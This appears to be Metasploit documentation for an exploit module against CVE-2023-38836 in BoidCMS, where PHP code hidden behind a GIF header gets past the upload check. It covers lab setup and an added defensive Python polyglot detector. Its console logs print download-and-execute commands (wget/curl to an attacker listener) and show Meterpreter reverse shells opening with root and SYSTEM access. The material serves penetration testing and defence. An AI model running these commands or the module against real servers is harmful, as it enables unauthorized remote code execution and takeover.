metasploit-gs/documentation/modules/exploit/multi/http/cve_2023_38836_boidcms.md
## Vulnerable Application
This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0
and below. BoidCMS allows an authenticated user to upload a PHP file as media if the file
begins with the GIF header, even though the file is a PHP file.
Once the file is uploaded, a user can then feed a command to the PHP file in a `GET` request.
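The header-only media check that this bug relies on, beside a hardened check and a scanner for GIF/PHP polyglots, as an added Python example that is not code from BoidCMS or from the Metasploit module; the function names and the sample bytes are constructed for illustration.

```python
# Added example (not part of BoidCMS or the Metasploit module): a defender-side
# view of the upload weakness. A file that starts with a GIF header but carries
# PHP code is a GIF/PHP polyglot; the weak check accepts it, the hardened one
# rejects it, and the scanner flags it in an existing media directory.
import re

GIF_MAGIC = (b"GIF87a", b"GIF89a")
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Allowed media types: extension -> magic bytes the content must start with.
ALLOWED_MEDIA = {
    "gif": GIF_MAGIC,
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

def weak_is_media(data: bytes) -> bool:
    """Header-only check of the kind the vulnerability relies on:
    anything that begins like a GIF is accepted, whatever its extension."""
    return data.startswith(GIF_MAGIC)

def is_gif_php_polyglot(data: bytes) -> bool:
    """Detection: GIF magic bytes followed anywhere by a PHP open tag."""
    return data.startswith(GIF_MAGIC) and PHP_TAG.search(data) is not None

def hardened_is_media(filename: str, data: bytes) -> bool:
    """Hardened upload check: the extension must be on the allow-list, the
    content must match that extension's magic bytes, and no PHP open tag may
    appear. Executable extensions such as .php therefore never pass."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    magics = ALLOWED_MEDIA.get(ext)
    if magics is None or not data.startswith(magics):
        return False
    return PHP_TAG.search(data) is None

# Constructed samples: a minimal valid 1x1 GIF, and a GIF-headed file with PHP inside.
PLAIN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
POLYGLOT = b"GIF89a<?php echo 'hello'; ?>"

if __name__ == "__main__":
    for name, data in (("logo.gif", PLAIN_GIF), ("eI1lHLx.php", POLYGLOT)):
        print(name, "weak:", weak_is_media(data),
              "hardened:", hardened_is_media(name, data),
              "polyglot:", is_gif_php_polyglot(data))
```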
## Installation
### Ubuntu 22.04.1 x64 (Any 'nix should work)
1. `sudo apt-get install apache2 #install apache`
2. `sudo apt-get install php8.0 #install php`
3. `sudo a2enmod rewrite #enable mod_rewrite`
4. `sudo systemctl restart apache2 #restart apache2`
5. Follow the installation instructions here: https://boidcms.github.io/#/install
   a. Download https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.0.zip, unzip it, and place
      the contents into the `/var/www/html/` folder on the Apache server.
   b. Add
      `$App->page = ltrim( $_SERVER[ 'PATH_INFO' ] ?? '', '/' );`
      before the following line:
      `$App->render();`
6. `reboot`
7. `cd /var/www/html`
8. `sudo php -S [ip_address]:8080 #start php server`
### Windows Server 2019 (Any Windows should work)
1. Download and install XAMPP for Windows from https://www.apachefriends.org/download.html
2. Reboot
3. Open the XAMPP Control Panel as admin.
4. Follow the installation instructions here: https://boidcms.github.io/#/install
   a. Download https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.0.zip, unzip it, and place
      the contents into the `C:\xampp\htdocs\` folder on the Apache server.
   b. Add
      `$App->page = ltrim( $_SERVER[ 'PATH_INFO' ] ?? '', '/' );`
      before the following line:
      `$App->render();`
5. Verify that mod_rewrite is enabled for Apache.
   a. Click on the `Config` button beside the Apache status in the XAMPP Control Panel
   b. Select `httpd.conf`
   c. Verify that `LoadModule rewrite_module modules/mod_rewrite.so` is uncommented
   d. Restart Apache if you needed to uncomment the above line
6. Start the PHP server
   a. Open a cmd window as Administrator
   b. `cd C:\xampp\htdocs\`
   c. `C:\xampp\php\php.exe -S 10.5.134.102:8080` (I don't know why we start the server on port 8080,
      but on Windows we access it with the RPORT value of 80.)
## Verification Steps
1. Install BoidCMS
1. Start msfconsole
1. Do: `use exploit/multi/http/cve_2023_38836_boidcms`
1. Do: `set CMS_USERNAME [username]`
1. Do: `set CMS_PASSWORD [password]`
1. Do: `set TARGETURI [target uri]`
1. Do: `run`
1. You should get a shell.
## Options
### CMS_USERNAME
The username for the BoidCMS admin panel. Default is `admin`.
### CMS_PASSWORD
The password for the BoidCMS admin panel. Default is `password`.
### TARGETURI
The root of the web page BoidCMS manages. Empty string by default.
## Scenarios
### BoidCMS on Ubuntu 22.04.1 x64
```
msf6 exploit(multi/http/cve_2023_38836_boidcms) > show options
Module options (exploit/multi/http/cve_2023_38836_boidcms):
Name Current Setting Required Description
---- --------------- -------- -----------
CMS_PASSWORD password yes Password
CMS_USERNAME admin yes Username
PHP_FILENAME eI1lHLx.php yes The name for the php file to upload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.5.134.129 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI yes The path
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME LZfjvRRrNR no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces.
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 nix Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/cve_2023_38836_boidcms) > run
[*] Command to run on remote host: wget -qO /tmp/oEsnOArk http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/oEsnOArk; /tmp/oEsnOArk &
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Detected BoidCMS, but the version is unknown.
[*] Getting Token
[*] Logging into CMS
[*] Uploading PHP file eI1lHLx.php
[*] launching Payload
[*] Client 10.5.134.129 requested /v3vZxR3P-stuKWjUe6pCeA
[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.134.129
[+] Deleted eI1lHLx.php
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:49168) at 2024-02-16 16:32:33 -0600
meterpreter > sysinfo
Computer : 10.5.134.129
OS : Ubuntu 22.04 (Linux 6.5.0-17-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
```
### BoidCMS on Windows Server 2019 x64
```
msf6 exploit(multi/http/cve_2023_38836_boidcms) > show options
Module options (exploit/multi/http/cve_2023_38836_boidcms):
Name Current Setting Required Description
---- --------------- -------- -----------
CMS_PASSWORD password yes Password
CMS_USERNAME admin yes Username
PHP_FILENAME eI1lHLx.php yes The name for the php file to upload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.5.134.102 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI yes The path
VHOST no HTTP server virtual host
Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME EwRzYaki no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/cve_2023_38836_boidcms) > run
[*] Command to run on remote host: curl -so %TEMP%\YnmWUfMzCxY.exe http://10.5.135.201:8080/h8r3u5VU3v-qeqUW3_anLw & start /B %TEMP%\YnmWUfMzCxY.exe
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /h8r3u5VU3v-qeqUW3_anLw
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Detected BoidCMS, but the version is unknown.
[*] Getting Token
[*] Logging into CMS
[*] Uploading PHP file eI1lHLx.php
[*] launching Payload
[*] Client 10.5.134.102 requested /h8r3u5VU3v-qeqUW3_anLw
[*] Sending payload to 10.5.134.102 (curl/7.55.1)
[+] Deleted eI1lHLx.php
[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.134.102:50085) at 2024-02-16 16:41:48 -0600
meterpreter > sysinfo
Computer : WIN-2E6BPFGP9F7
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN-2E6BPFGP9F7\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
```